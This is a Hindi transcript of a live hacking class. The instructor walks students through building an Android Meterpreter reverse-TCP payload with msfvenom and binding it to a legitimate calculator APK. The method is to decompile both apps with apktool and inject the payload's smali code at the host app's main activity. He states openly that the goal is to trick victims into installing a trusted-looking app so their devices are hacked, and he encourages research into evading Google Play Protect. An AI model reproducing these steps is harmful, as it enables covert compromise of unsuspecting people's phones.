यस हेलो एवरीवन, विश यू ऑल अ वेरी गुड इवनिंग। मेरी वॉइस ऑडिबल है सभी को? ऑडिबल है मेरी वॉइस? परफेक्ट। ग्रेट एवरीवन, सो स्टार्ट करते हैं आज के टॉपिक को। कल हमने पेलोड बनाने के प्रोसेस को देखा था। ठीक है। लास्ट में हम उसे एंड नहीं कर पाए थे, ऑल्दो एक इशू हमारे पास आ चुका है, वो गूगल पे प्रोटेक्शन का इशू है। अब हमारे पास दो ऑप्शन है, दोनों ऑप्शन आपके सामने रखता हूँ और लेट्स सी हम वहां क्या कर सकते हैं। देखो, पहला ऑप्शन ये है कि मैं आपको ऑटोमेशन पेलोड जनरेट करने का प्रोसेस सिखा दूं। ठीक है। ऑल्दो ये क्लियर है कि हम किसी भी तरीके का पेलोड बनाए, गूगल पे प्रोटेक्शन फिलहाल रोकेगा। ऑटोमेशन प्रोसेस में बस आपको ये इश्यूज नहीं आएंगे जो आपको लास्ट क्लास में आए थे, कि वो वर्जन इश्यूज जो है ना, ओल्डर वर्जन वाला इशू, नॉट कंपेटेबल वाला इशू, और एक ग्राफिकल इंटरफेस मिल जाएगा जिससे आप प्रोसेस आसानी से कर पाओगे। लेकिन बाईपास कौन नहीं हो रहा है, वो है गूगल पे प्रोटेक्शन जो रिसेंटली लॉन्च हुआ है। तो पहला तरीका तो है कि मैं आपको ऑटोमेशन प्रोसेस सिखाऊं। दूसरा तरीका यह है कि एक मैनुअल तरीका होता है पेलोड को बाइंड करने का। ऑटोमेशन प्रोसेस में भी पेलोड बाइंड हो रहा है और ऑटोमेशन में लिमिटेशन है। लेकिन अगर हम मैन्युअली पेलोड बाइंड करना सीख जाते हैं तो चांसेस हैं कि हम अपनी तरफ से एक्सपेरिमेंट्स करते करते शायद उस प्ले प्रोटेक्शन को बाईपास कर पाए। अब आप लोग बताओ हम किस डायरेक्शन में आगे बढ़े, लेकिन मैं पहले ही क्लियर कर देता हूं कि मैं आपको फिलहाल मैन्युअली पेलोड बनाना या मैन्युअली पेलोड को बाइंड करना, दो एप्स को जोड़ना, वो प्रोसेस मैं आपको मैनुअल और डिटेल लेवल में सिखा दूंगा। लेकिन प्ले प्रोटेक्शन बाईपास करने के लिए खुद से रिसर्च करनी पड़ेगी। सो एवरीवन बताओ कौन सी अप्रोच की तरफ जाएं, ऑटोमेशन पेलोड जनरेशन पे जाएं या फिर मैनुअल पेलोड बनाने का, मैनुअल पेलोड बाइंड करने का प्रोसेस मैं आपको डिटेल में सिखाऊं। देखो मैं एक आइडिया दे देता हूँ यहाँ पे ताकि अच्छे से समझ आए। ध्यान देना, दोनों कंसेप्ट का मैं आपको प्लस और नेगेटिव पार्ट दोनों दिखा रहा हूँ। ठीक है। पहला तरीका है अमित। ये अमित क्या करता है? सर, ये अमित आपको एक ग्राफिकल इंटरफेस देता है। यहाँ पे आप एक क्लिक में एप्लीकेशन को बाइंड कर पाते हो। बाइंड का मतलब है आपके मिलीशियस एपीके को एक ओरिजिनल एपीके के साथ जोड़ना। जैसे आपने व्हाट्सएप के साथ जोड़ दिया, फेसबुक के साथ जोड़ दिया, इंस्टाग्राम के साथ जोड़ दिया, या कोई चेस गेम के साथ जोड़ दिया, एक यूजर को जोड़ दिया, पसंद है, ऐसे किसी ऐप के पीछे छुपा दिया। अब लोगों को सामने रियल ऐप दिखेगा तो वो उसे इंस्टॉल करेंगे और उनका डिवाइस हैक हो जाएगा। इंस्टॉल इसलिए करेंगे क्योंकि हमने एक ऐसे ऐप के साथ जोड़ा है जो उन्हें पसंद है, तो हम उन्हें कन्विंस कर पाएंगे। इसे बाइंडिंग कहते हैं, दो ऐप्स को जोड़ना, मिलिशियस ऐप को पुराने ऐप के पीछे छुपाना। लेकिन फिलहाल इशू क्या है कि अमित के जरिए जो हम एप्लीकेशन बनाएंगे बाइंडिंग के बाद भी, प्ले प्रोटेक्शन उसे अभी भी रोकेगा। प्ले प्रोटेक्शन उसे रोकेगा जरूर, क्योंकि प्ले प्रोटेक्शन ने साफ कह दिया है कि कोई भी ऐप जो प्ले स्टोर के बाहर का है मैं इंस्टॉल ही नहीं होने दूंगा। जबकि देखा जाए तो एक्चुअली क्या होता है, आप लोगों ने मॉड एपीके यूज नहीं है कभी? सब लोग चैट में रिप्लाई करना और कोशिश करना थोड़ा फास्ट करना ताकि हम आगे प्रोसीड करा सकें। मॉड एपीके यूज नहीं है, है? व्हाट्सएप का मॉड एपीके यूज लिया होगा, जीबी व्हाट्सएप जिसे कहते हैं, या अलग अलग तरीके के मॉड एप्लीकेशन यूज होंगे अलग अलग रीजंस की वजह से। कई ऐसे ऐप भी इंस्टॉल करे होंगे जो प्ले स्टोर में अवेलेबल नहीं है, प्ले स्टोर ने हटा दिए हैं। करेक्ट। द पार्ट इज कि अब ऐसा कोई भी एप्लीकेशन इंस्टॉल नहीं करने दे रहा बाय डिफॉल्ट। अब यूजर्स को मॉड एपीके चाहिए होता है, वो प्ले स्टोर में कभी नहीं मिलता। क्या कभी कोई मॉड एपीके प्ले स्टोर से इंस्टॉल करा है आपने? नहीं, बाहर से ही करते हैं हर बार। हम बाहर से इंस्टॉल करते हैं, कोई सेटिंग रोक के तो उसे हटाते हैं, बंद करते हैं, फिर ऐप इंस्टॉल करते हैं क्योंकि हमें वो ऐप चाहिए। तो अगर किसी ने वो सेटिंग बंद कर दी है तब तो हमारा ये पेलोड काम आ जाएगा, लेकिन जब तक नहीं करी है तो ये तो था पहला तरीका, जब तक नहीं करिए तब तक तो रोकेगा। दूसरा तरीका क्या है? दूसरा तरीका है कि आप मैन्युअली आपका मिलिशियस एपीके यानी आपका पेलोड बनाओ। ऐसा ही एक ओरिजिनल सॉफ्टवेयर उठाओ, उसे डीकंपाइल करो। डीकंपाइल करो मतलब उसके पूरे प्रोग्राम को खोल दो, ऐप को ओपन कर दो, ऐप के सही लोकेशन में जाके इस ऐप को वहां जोड़ दो। ठीक है। और जोड़ने के बाद ऐप को फिर से बनाओ, और फिर से बनाने के बाद इस ऐप को अच्छे से साइन कर दो, इसमें सिग्नेचर्स डाल दो,
और आगे चल के एक दो पॉइंटर्स बताऊंगा, वो आपको खुद से ट्राई करने पड़ेंगे। कुल मिला के मैं मैन्युअली पूरा ऐप बनाऊं, ताकि अगर अमित कहीं अमित कई एप्स को बाइंड नहीं कर पाए, कुछ एप्स को बाइंड कर देगा, लेकिन जो कॉम्प्लिकेटेड एप्स होते हैं ना, जिनकी प्रोग्रामिंग कॉम्प्लिकेटेड है, वो ओरिजिनल सॉफ्टवेयर जिनके प्रोग्रामिंग कॉम्प्लिकेटेड है, वहां ये एपीके को कभी जोड़ने नहीं देगी, मतलब अकेला बाइंड कर नहीं पाएगा। एक ऑटोमेशन सॉफ्टवेयर पूरे एप्लीकेशन के स्ट्रक्चर को नहीं समझ पाएगा, तो दो ऐप को जोड़ नहीं पाएगा। लेकिन अगर मैंने मैन्युअली करा है, तो हम किसी भी ऐप के साथ अपने सॉफ्टवेयर को जोड़ पाएंगे। और ऐसा करने पे शायद चांसेस हैं कि वो जो गूगल प्ले प्रोटेक्शन है, उसको आगे चल के एक टाइम पे बाईपास करता है। नाउ आप लोग बताओ, ऑटोमेशन अप्रोच की तरफ जाना है या मैनुअल अप्रोच की तरफ जाना है? दोनों के फायदे नुकसान बता दिए, इसमें एक एक क्लिक में पूरा पेलोड बन जाएगा। ये डिफिकल्ट है, यहाँ मेहनत करनी पड़ेगी खुद से भी। मैं करा रहा हूँ, टॉपिक से ओवर जाके करा रहा हूँ, क्योंकि एक एक्सेप्शन आया है, तो मैं चाह रहा हूँ आपको थोड़ा एक्स्ट्रा बता सकूं, ताकि एक डायरेक्शन तो दिखे एटलीस्ट। चलो, मैं मैनुअल प्रोसेस जरूर करा रहा हूँ, बट ध्यान देना, बहुत फोकस मांगेगा ये प्रोसेस, और एक्स्ट्रा मेहनत भी मांगेगी। गॉट इट एवरीवन? रेडी है सब लोग? ठीक है। कोई इस मैनुअल प्रोसेस के लिए पूरा मुझ पे डिपेंड नहीं होगा, वो सही अप्रोच नहीं रहेगी, ना ही आपके काम आएगी, ना ही मैं उतना सपोर्ट दे पाऊंगा, क्योंकि मैं ऑलरेडी आपको एक डिटेल टॉपिक में ले जाने, एक बड़े टॉपिक में ले जाने की कोशिश कर रहा हूँ। ना ही हमें ऐप का स्ट्रक्चर पता है, ना ही ऐप डेवलपमेंट आती है, ना ही ऐप पेनिट्रेशन टेस्टिंग आती है, फिर भी मैं उस कंसेप्ट में आपको डीप डाइव करवा रहा हूँ। ठीक है। अच्छा, ये बताओ, अभी रिसेंटली यूट्यूब पे मेरा एक वीडियो अपलोड हुआ था, मॉड एपीके वाला, लाइव के तौर पे एज ए प्रीमियर अपलोड हुआ था। देखा है आपने? किसी ने देखा वो वीडियो? नहीं देखा है? ठीक है, कुछ ने देखा है, ज्यादातर ने नहीं देखा। ठीक है, मैं एक काम करता हूँ, पहले आपको मैं ये पूरा प्रोसेस सिखाता हूँ, उसके बाद वो वीडियो रिकमेंड करूंगा, वो वीडियो भी देखना, थोड़ी एक्स्ट्रा नॉलेज मिल जाएगी। ठीक है। एग्जैक्टली अशफाक, इसलिए मैं कह रहा हूँ ये प्रोसेस डिफिकल्ट है ना? अगर वो वीडियो नहीं समझ आया था, तो ये भी हो सकता है मुश्किल से समझ आए, बट चलो मैं समझाता हूँ, इजी लैंग्वेज में समझना। आज अगर कोई भी डेवलपर, कोई भी प्रोग्रामर एक एपीके फाइल बनाता है, एपीके यानी एप्लीकेशन फाइल, एंड्रॉइड का सॉफ्टवेयर, तो ये एप्लीकेशन फाइल कैसे बनती है? सर, इस एप्लीकेशन फाइल में क्या होता है, सबसे पहले जो डेवलपर है वो सोर्स कोड लिखता है, यानी पूरा का पूरा मेन प्रोग्राम लिखता है, जिसे हम कहते हैं सोर्स कोड। ये प्रोग्राम ज्यादातर जावा में लिखा जाता है, अलग अलग प्रोग्रामिंग आ चुकी है, पर जावा बेस समझ लो। डेवलपर ने जावा में ऐप के सारे फंक्शंस लिखे, ऐप क्या क्या काम करेगा, क्या क्या लॉजिक है, क्या क्या प्रोग्राम है, पूरा सोर्स कोड उसने जावा प्रोग्रामिंग में लिखा। उसके बाद इसे एग्जीक्यूट करा, तो इसे मिली जावा की क्लास फाइल। उसके बाद इसने क्या करा, ताकि ये सोर्स कोड हर कोई ना पढ़ सके, तो इसने इसे कन्वर्ट कर दिया बाइट कोड्स में, सिक्योर बाइट कोड, जिसे हम कहते हैं डॉट डीईएक्स, डैक्स एक्सटेंशन में, डैक्स फाइल में। डैक्स फाइल क्या है? सर, सोर्स कोड को इस तरीके से लिख दिया कि कोई पढ़ के समझ ना पाए। अब अगर मैंने प्रोग्रामिंग करी है एक ऐप की, तो उस ऐप की प्रोग्रामिंग को अलग अलग फाइल्स की जरूरत पड़ेगी, इमेजेस की जरूरत पड़ेगी, वीडियोस की जरूरत पड़ सकती है, ऑडियोस की जरूरत पड़ सकती है, आइकन्स की जरूरत पड़ेगी। ऐप में तो बहुत सारी चीजें होती है ना, तो हर चीज जिस जिसकी जरूरत थी उसके मैंने फोल्डर बनाए, और फोल्डर में मैंने वो सारा डेटा रख दिया। तो अब एक ऐप से रिलेटेड एक तो उसका सोर्स कोड हो गया, एक उसके सारे फोल्डर्स हो गए जिसमें उसका सारा डेटा चला गया। एक फाइल और होती है जिसे हम कहते हैं एंड्रॉइड मैनिफेस्ट डॉट एक्सएमएल फाइल। ये एंड्रॉइड मैनिफेस्ट डॉट एक्सएमएल फाइल क्या है? सर, ये एक ऐसी फाइल है जो इस पूरे ऐप का, जो पूरा एप्लीकेशन आप बना रहे हो ना, उस पूरे ऐप का स्ट्रक्चर अपने पास रखती है, यानी सारा का सारा ओवरऑल डेटा। स्ट्रक्चर मतलब इस ऐप में क्या क्या फंक्शंस हैं, ये ऐप क्या क्या परमिशंस देगा, कैमरा, लोकेशन, एक ऐप परमिशन लेता है ना मोबाइल डिवाइस में, वो भी यही लिखा होगा। इस ऐप में कितने पेजेस बना रखे हैं, पेजेस के नाम क्या है, सारा डेटा यहाँ लिखा रहता है। ठीक है, हमने कहा ठीक है, हम क्या चाहते हैं कि हमने एक मिलिशियस एपीके बनाया,
इस मिलिशियस एपीके में एक प्रोग्राम है पेलोड वाला। हमने जो मिलिशियस ऐप बनाया है उस पूरे ऐप में कोई एक प्रोग्राम का पेज है जिसमें सिस्टम हैकिंग वाला कोड लिखा हुआ है। मैं उस केवल एक प्रोग्राम को, पूरे ऐप को नहीं, केवल उस एक प्रोग्राम को ओरिजिनल सॉफ्टवेयर के साथ जोड़ना चाहता हूँ। एक सेकेंड, क्या करना चाहता हूँ? ओरिजिनल सॉफ्टवेयर के साथ जोड़ना चाहता हूँ। तो मैं क्या करूंगा, ओरिजिनल सॉफ्टवेयर को खोलूंगा, फिर से ओपन कर दूंगा। वैसे तो ये जिप एपीके फाइल कंप्रेस होती है, मैं इसे एक्सट्रैक्ट करूंगा, ओपन करूंगा, सारे फाइल फोल्डर्स दिखेंगे, उन्हें डिकोड करूंगा ताकि पढ़ सकूं, क्योंकि बाय डिफॉल्ट रीड नहीं कर सकता मैं। रीडेबल फॉर्मेट में ले जाऊंगा, उसके बाद ये प्रोग्राम यहाँ पे ऐड कर दूंगा, फिर ऐप को वापस बंद करूंगा। और कोई भी ऐप जो मैं बनाऊं या एक डेवलपर बनाए, जब इस ऐप को बंद करा जाता है ना, ये सारा ऐप बनता है जब, मान लो सारे ऐप बनाने के बाद मेरे पास जो फाइल आई वो आई लाइट डॉट एपीके, एक फाइल आ गई लाइट डॉट एपीके में। ये जो लाइट डॉट एपीके फाइल मेरे सारे कोड्स को कंबाइन करके मैंने बनाई है, ये कहलाती है डेमो एपीके। क्या कहते हैं इसको? इसको डेमो एपीके कहते हैं। डेमो एपीके क्यों कहते हैं? क्योंकि सर इस एप्लीकेशन में कोई भी सिग्नेचर नहीं है। सिग्नेचर यानी डेवलपर को अपनी इंफॉर्मेशन वहां डालनी पड़ती है कि इस ऐप को किसने बनाया, कहाँ बनाया, कौन सी कंट्री, कौन सी कंपनी, ऐसा एक फॉर्म होता है, वो फॉर्म फिल करा जाता है। फॉर्म फिल करने के बाद ऐप को, हर एक एप्लीकेशन को एक नई आईडी मिलती है, एक नई पहचान मिलती है, हैश आईडी। ठीक है, वो कब मिलेगी? जब मैं सिग्नेचर यानी ये फॉर्म फिल करूंगा। जब तक आप इस फॉर्म को फिल नहीं करते तब तक ये एक डेमो एप्लीकेशन कहलाता है। जब आप एक फॉर्म फिल करके, यानी ऐप को साइन करके, साइन यानी अपना सारा डेटा मेंशन करके, अगर उसको ऐप के साथ जोड़ देते हो तो आपको मिलता है फाइनल एपीके। ये एप्लीकेशन हर एंड्रॉइड डिवाइस सपोर्ट करेगा, हर एंड्रॉइड डिवाइस में इंस्टॉल हो सकता है और चल सकता है। अगर मैं कहूँ कि सर केवल डेमो एपीके इंस्टॉल कर लूँ तो ऐप एंड्रॉइड की सिक्योरिटी कभी करने ही नहीं देगी। समझ आया? ऐप बनने के बाद उसे साइन करना भी जरूरी है। अब इसे एक एक करके करने की कोशिश करेंगे, कॉम्प्लिकेशंस बहुत सारी आएगी, बट हम धीरे धीरे रिजॉल्व करेंगे। शायद हो सकता है आज और कल दोनों दिन इसके सेटअप में लग जाए स्टार्टिंग से, क्योंकि हमने सेटअप नहीं करा है ना, तो आपको जो मैं सेटअप करा रहा हूँ उसमें टाइम लग सकता है। खैर, मैं आप लोगों की मशीन में सेटअप कराने की कोशिश करता हूँ। आप में से कोई भी एक पर्सन जो फास्ट इंस्ट्रक्शंस को एग्जीक्यूट कर सके, मेरे कहते ही सारे टास्क फास्टली परफॉर्म कर सके, कोई एक पर्सन स्क्रीन शेयर कर दो जो सारे काम फास्ट कर सके। ओके अशफाक, आ जाओ काली मशीन पे। ठीक है, फुल डिस्प्ले कर दो काली मशीन पे। वो दिख जाएगा, जो जूम के आइकन्स आ रहे हैं उससे फर्क नहीं पड़ेगा, उन्हें उठा के साइड में कर देना, पर काली को फुल डिस्प्ले जरूर कर देना। ठीक है, बहुत अच्छे, इतना काफी है। अब आप यहाँ पे सबसे पहले हम बेसिक पेलोड बनाएंगे, है ना। आईपी अभी पब्लिक नहीं देंगे क्योंकि बहुत टाइम टेकिंग प्रोसेस है, तो अभी पब्लिक आईपी नहीं देंगे। तो आप कमांड लिखो एमएसएफ है ना, एमएसएफ वेनम -p। आई थिंक है ना, अशफाक का नेटवर्क इशू है। आप में से कोई एक और भी अपना स्क्रीन शेयर कर देना, साइमल्टेनियसली साथ में टास्क करते रहना। ठीक है, अशफाक, अविनाश ने कर दिया। ठीक है, टर्मिनल पे जाओ अविनाश। अशफाक, आपकी स्क्रीन शेयरिंग बंद कर रहा हूँ क्योंकि नेटवर्क इशू है, तो टास्क अच्छे से नहीं कर पाएंगे, इशू आएगा। ओके अविनाश, काली को, अविनाश फुल डिस्प्ले कर दो काली को, मतलब थोड़ा एक्सट्रैक्ट कर दो, काफी शॉर्ट शो हो गया। बहुत अच्छे। अब जाओ टर्मिनल में, फुल डिस्प्ले कर दो टर्मिनल को, थोड़ा जूम कर दो, रूट परमिशन ले लो, और कमांड लिखो एमएसएफ वेनम, VENOM
स्पेस -p स्पेस एंड्रॉइड स्लैश, विदाउट स्पेस है ना, स्लैश मीटर Meter स्लैश रिवर्स REVERSE अंडरस्कोर TCP स्पेस एल होस्ट इक्वल्स टू। अच्छा, मुझे हमें अपनी प्राइवेट आईपी डालनी पड़ेगी, और पॉइंटर ये है कि हमें वाइड एरिया नेटवर्क में, मतलब लोकल एरिया नेटवर्क, बाहरी नेटवर्क में जाना पड़ेगा। सो डू वन थिंग, एक बार अपनी काली की सेटिंग्स में जाओ। ये सेटिंग्स नहीं, वर्चुअल मशीन वाली सेटिंग्स जहाँ पे नेटवर्क अडेप्टर चेंज करते हैं। फाइल पे क्लिक करो सबसे टॉप में, एडिट पे जाओ, व्यू में जाओ, VM, लास्ट में सेटिंग्स है। यहाँ पे नेटवर्क अडेप्टर में जाओ और ब्रिज सिलेक्ट कर दो। ठीक है, ओके कर दो। अगर कुछ सेकंड्स में आपको आईपी मिल गई तो वेल एंड गुड, अगर नहीं मिलती है तो हमें एक सेटिंग और सही करनी पड़ेगी। वेट करते हैं थोड़ा सा। मिल गई, बहुत अच्छा। एक नया टैब ओपन कर दो, IF कॉन्फ़िग कमांड रन करो। ये जो आईपी है 192.168.1.7, इसे कॉपी कर लो। हाँ, यहाँ पेस्ट कर दो, स्पेस एल पोर्ट इक्वल्स टू कोई भी एक पोर्ट दे दो, जैसे कि 5757। एंटर। हाँ हाँ, सॉरी, कोई बात नहीं, कंट्रोल C करो। कंट्रोल C कर देना थोड़ा फास्ट। कोई, ठीक है, अपर एरो दबाओ फिर से, और स्पेस देके एक ग्रेटर देन का सिंबल लगाना। स्पेस दो और इसके आगे लिखो test.apk। ये हमारा पेलोड एपीके है ना, मिलीशियस एपीके है। चाहो तो इसका नाम पेलोड रख दो, ताकि कंफ्यूजन ना हो आप लोगों को, पहली बार कर रहे हो ना, काफी लोग। PAYLOD payload.apk, एंटर। ऐसा करने पे मेरा मिलीशियस ऐप बन चुका है। मुझे इस मिलीशियस ऐप के कोड को ओरिजिनल सॉफ्टवेयर के साथ जोड़ना है, आपको ओरिजिनल सॉफ्टवेयर इंस्टॉल करना पड़ेगा। तो जाओ अपने ब्राउजर में, और हम यहाँ से कोई ऐसा सॉफ्टवेयर लेंगे जो हर मशीन में सपोर्ट कर जाता है, हर एंड्रॉइड डिवाइस में सपोर्ट कर जाता है। जैसे मान लो एक कैलकुलेटर है ना, तो लिखो Android calculator.apk। आपकी मशीन थोड़ा हैंग हो रही है अभी तो, चलो कोई बात नहीं, लेकिन आगे जो मैं कमांड रन करूंगा उससे ज्यादा हैंग होगी। फिर भी देखते हैं कब तक सपोर्ट करती है। जो स्क्रॉल डाउन करो, और एपी के ऊपर ऊपर, प्योर में तो फाइल सही नहीं आएगी। एक काम करो, ठीक है, एपी के प्योर से कर ले, देख लेंगे। अशफाक, मुझे उस एरर का स्क्रीनशॉट भेज दो चैट में,
शायद मैं ऐसे ही रिजॉल्व कर दी। अविनाश, इस पे कंट्रोल के साथ क्लिक करना। हाँ, थोड़ा स्क्रॉल अप करना ताकि एक और वेबसाइट ओपन कर सके। ऊपर ऊपर। एपी के मिरर पे क्लिक कर दो कंट्रोल के साथ। ठीक है, थोड़ा वेट करते हैं लोड होने का। ठीक है, ये कब से चालू हो गई ना। स्क्रॉल डाउन करो। स्क्रॉल टू अवेलेबल मिरर्स और मिनिमम वर्जन एंड्रॉइड 6 प्लस स्क्रीन डीपीआई आज एंड्रॉइड 6 प्लस 6 प्लस ठीक है, 6 प्लस बहुत है वेरिएंट है। स्क्रॉल टू अवेलेबल होंगे और स्क्रॉल डाउन करो तो टॉप पे आओ। सबसे टॉप में सबसे ऊपर। यहाँ अलग से डाउनलोड बटन नहीं दिखा रहा है, ठीक है, उसी पे कर दो फिर। थोड़ा स्क्रॉल डाउन करना और ऊपर ऊपर। हाँ, यहाँ पे जो पहली फाइल है ना, क्लिक कर दो। डाउनलोड बटन का है इसका। एक काम करो, ब्राउजर टैब में जाओ। फर्स्ट टैब में मतलब सर्च, जो सर्च बॉक्स, हाँ, स्क्रॉल डाउन करो। सॉफ्टोनिक से लेके देख लेते, चलो सॉफ्टोनिक पे जाओ। हाँ, ये फ्री डाउनलोड पे क्लिक कर दो। एपीटी इंस्टॉल एडीबी लिख दो अशफाक। आपको नहीं, आप तो ये डाउनलोड वाला बटन जैसे हाईलाइट हो ना, डाउनलोड कर देना। थोड़ी देर में हो जाएगा, वो थोड़ा स्लो चल रहा है सिस्टम। साथ साथ बाकी सब भी करते रहना, है ना, ताकि अगर सिस्टम ने अगर मिसबिहेव करा भी, ज्यादा हैंग भी हुआ, तो मैं स्विच करा दूंगा सिस्टम। एटलीस्ट प्रोसेस सबको दिखता रहेगा, तो यहाँ तक का प्रोसेस साथ में करना। कोई एक्सटेंशन चालू है क्या? एक्सटेंशन पर क्लिक करो। ये रैंडम यूजर एजेंट चालू तो नहीं है? क्लिक करो रैंडम यूजर एजेंट। नॉर्मल क्लिक, नॉर्मल क्लिक। हाँ, चलो डाउनलोड का ऑप्शन हाईलाइट हो गया, उसी पे क्लिक कर दो। कैंसिल करना क्रॉस। डाउनलोड प्रोसेस स्टार्ट हो जाएगा अपना, थोड़ा सा वेट करें। साथ साथ करते रहना सब लोग प्रोसेस, जैसे ही मुझे जरूरत लगेगी मैं स्क्रीन शेयर करवा दूंगा। अच्छा, एक काम करते हैं। और आपके एपी के मॉड सेटअप कौन कराएगा फिर?
मैं प्रोसेस करके बताता हूँ, जो टूल का सेटअप है वो नेक्स्ट क्लास में करा देता हूँ, है ना, ऐसा कर लेते हैं। मेरी मशीन में मैं जल्दी करके आपको दिखा पाऊंगा एटलीस्ट प्रोसेस। आप लोग मेरे साथ साथ प्रोसेस फॉलो करना है, मेरी मशीन देखना सीख लो। ठीक है, पहले मैं एक फोल्डर बना रहा हूँ, तो मैं लिख देता हूँ mkdir हैक। ठीक है, फिर cd हैक ls। मैंने एक फोल्डर बनाया ताकि सारा डेटा मैं इसी के अंदर रखूँ, सारा काम इसी के अंदर करूँ। मैंने यहाँ पे कमांड लिखा msf venom -p एंड्रॉइड इंटरप्रेटर रिवर्स टीसीपी। बस एल्गो सेल पोर्ट में प्राइवेट आईपी डाल दूंगा अभी के लिए, क्योंकि आपको प्रोसेस बता रहा हूँ तो मैं आईपी कुछ भी लिख रहा हूँ। ठीक है, मैंने एक एप्लीकेशन बनाया 7.ep के नाम का, और ये एप्लीकेशन जो है मेरे हैक्ड नाम के फोल्डर में सेव हो गया है। जब तक ये प्रोसेस हो रहा है मैं अपने ब्राउजर में जाता हूँ और कोई भी एक रैंडम ओरिजिनल सॉफ्टवेयर मैं यहाँ पे डाउनलोड कर लेता हूँ। मैंने कहा calculator.apk फाइल दे दो। आगे फ्री डाउनलोड लिख देता हूँ। अच्छा, .apk नहीं आया, .apk फ्री डाउनलोड, ये सॉफ्टवेयर आ गया। फ्री डाउनलोड क्रॉस डाउनलोड एपीके। ये हो गई यहाँ पे डाउनलोड। मैं इसे कॉपी कर लेता हूँ अपनी लोकेशन पे। मैंने इसे यहाँ से उठाया और मैं आया अपने काली फोल्डर में, कंट्रोल सी करके कर लेता हूँ, कॉपी किया, काली में आया, हेड फोल्डर में गया और पेस्ट कर दिया। परमिशन डिनाई, रूट में बना है इसलिए कोई बात नहीं, कमांड से कर दूंगा। cp स्लैश होम काली डाउनलोड्स, फाइल का नाम है MIUI। ठीक है, तो इस फाइल को रखना है हेड फोल्डर में। ls आ चुकी है, रीनेम कर देता हूँ mv फॉर्म स्पेस
इसका नया नाम रख देते हैं, क्या था, कैलकुलेटर CLC.APK एलएस। अब देखो मेरे पास दो एप्लीकेशन है, एक तो है CL.APK, एक Sanam.APK। ये मेरा मिलिशियस प्रोग्राम है, ये मेरा ओरिजिनल प्रोग्राम है। मैं दोनों को ओपन करूंगा, दोनों के अंदर का डेटा देखना चाहता हूँ। तो उसके लिए टूल यूज लेंगे एपीके टूल। अगर आपके पास पहले से इंस्टॉल ना हो तो केवल एपीके टूल लिख के एंटर प्रेस कर देना, इंस्टॉल हो जाएगा। या एपीटी इंस्टॉल एपीके टूल लिख देना। ठीक है, मैंने एपीके टूल लिखा, स्पेस डी करा, जिसका मतलब है डिकम्पाइल, यानी ऐप को खोलना। डैश डी नहीं लिखना है, केवल डी लिखना है। आगे Sanam.APK करा, यानी मैंने कहा पहले पेलोड को खोल दो। पेलोड को खोलने के बाद calc.apk को खोल दूंगा, यानी ओपन कर दूंगा, डिकम्पाइल कर दूंगा। तो मैंने यहाँ पे कहा एपीके टूल और calc दोनों एप्लीकेशन को खोल दिया, ताकि दोनों एप्लीकेशन के कोड्स को कनेक्ट कर सके। ठीक है, हाँ अशफाक अब हो जाएगा। अब अगर मैं यहाँ पे एलएस करता हूँ तो आप देखोगे दोनों एप्लीकेशन का एक एक फोल्डर बन चुका है। सनम नाम का फोल्डर बन चुका है, कैरेट नाम का फोल्डर बन चुका है। इनके अंदर ऐप का सारा डेटा खोल के रखा हुआ है, ताकि मैं उसे देख सकूं, मॉडिफाई कर सकूं। हमारा गोल क्या होता है? हमारा गोल क्या होता है कि सर हम जो भी फोल्डर है उसके अंदर जाके उसके कंटेंट को देख पाए और हम समझ पाए उसमें मॉडिफिकेशन क्या करना है ना? तो हमने यहाँ पे लिखा CD कैट। इस फोल्डर में आने के बाद ये ओरिजिनल सॉफ्टवेयर है ना, मुझे एक्चुअली क्या करना है, मैं आपको पहले सनम वाले फोल्डर में ले गया। ध्यान देना, अगर मैं CD सनम करता हूँ, एलएस करता हूँ, यहाँ पे ये स्मॉली नाम का फोल्डर दिख रहा है सभी को, स्मॉल आई स्मॉली फाइल। मैं इस फोल्डर के अंदर जाऊंगा, क्योंकि यहाँ पे है हमारा सोर्स कोड, आप ऐसा समझ सकते हो। ठीक है, मैंने एलएस करा, कॉम नाम का फोल्डर आया, मैं उसके अंदर भी चला गया। फिर एलएस करा, मेटास्प्लॉइट आया, मैं उसके अंदर भी चला गया, CD मेटास्प्लॉइट। फिर एलएस करा, स्टेज आया, CD स्टेज कर दिया। फिर एलएस करा, यहाँ पे मुझे कई सारी फाइल्स दिख रही है, करेक्ट। इनमें से मेरा मेन पेलोड वाला कोड कौन सा है? ये वाला पेलोड डॉट स्मॉली फाइल दिख रही है, ये मेरा मेन पेलोड है। पेलोड है ना? मुझे इस कोड को जोड़ना है मेन सॉफ्टवेयर के साथ में। तो इसे मैं कहाँ जोड़ूंगा? मैं चाहता हूं कि जैसे ही ऐप स्टार्ट हो जाए, ऐप के स्टार्ट होते ही जो उसका सबसे पहला पेज कॉल होता होगा, उसके साथ पेलोड वाला पेज भी कॉल हो जाए, ऐसा मैं चाहता हूं। ठीक है, तो इसके लिए मुझे ये फाइल वहां पे कॉपी करनी पड़ेगी। तो मैंने क्या किया, मैं फिर से बैक आया, CD स्पेस डॉट डॉट CD स्पेस डॉट डॉट और एलएस। मैं गया कैल्क फोल्डर में, मैंने यहाँ पे देखा एंड्रॉइड मैनिफेस्ट डॉट एक्सएमएल है, जो पूरे सॉफ्टवेयर का स्ट्रक्चर रखती है। मैं जानना चाहता हूँ सॉफ्टवेयर स्टार्ट होती है सबसे पहले कौन सी फाइल कॉल होती है। तो मैंने यहाँ पे लिखा gedit एंड्रॉइड मैनिफेस्ट डॉट एक्सएमएल। जब मैंने ऐसा करा तो इसने मुझे ऐप का पूरा स्ट्रक्चर बताया, ऐप क्या है, कैसे बना हुआ है, ऐप क्या क्या परमिशन लेगा, है ना, एक मशीन में क्या क्या एक्टिविटीज परफॉर्म करने की परमिशन लेगा, एक ओरिजिनल सॉफ्टवेयर, ये वो बता रहा है। और स्क्रॉल डाउन करूँ तो जहां पे सबसे पहले एक्टिविटी वर्ड देखने को मिलेगा ब्लू कलर में, वहां हमें ध्यान देना है। ये दिखाया एक्टिविटी एंड्रॉइड। अब एक्टिविटी में सबसे पहली एक्टिविटी ये कॉल कौन सी कर रहा है, तो वो है ये है वो एक्टिविटी जो ऐप के स्टार्ट होते ही सबसे पहले रन हो रही है, जिसको मेन एक्टिविटी कहा गया है। और यही एक्टिविटी यहाँ भी दिखाई गई एक्शन एंड्रॉइड में। ये समझ लो ये है मेन एक्टिविटी। एक्शन है ना, नहीं एक्टिविटी चाहिए सर, इंटेंट नहीं चाहिए। अच्छा, इसमें एक्टिविटीज कम ही है, एक ही एक्टिविटी है, और आसान हो गया। इसका एक्टिविटी टैग कहाँ है? एक्टिविटी एंड्रॉइड एक ही है। एक्टिविटी का मतलब होता 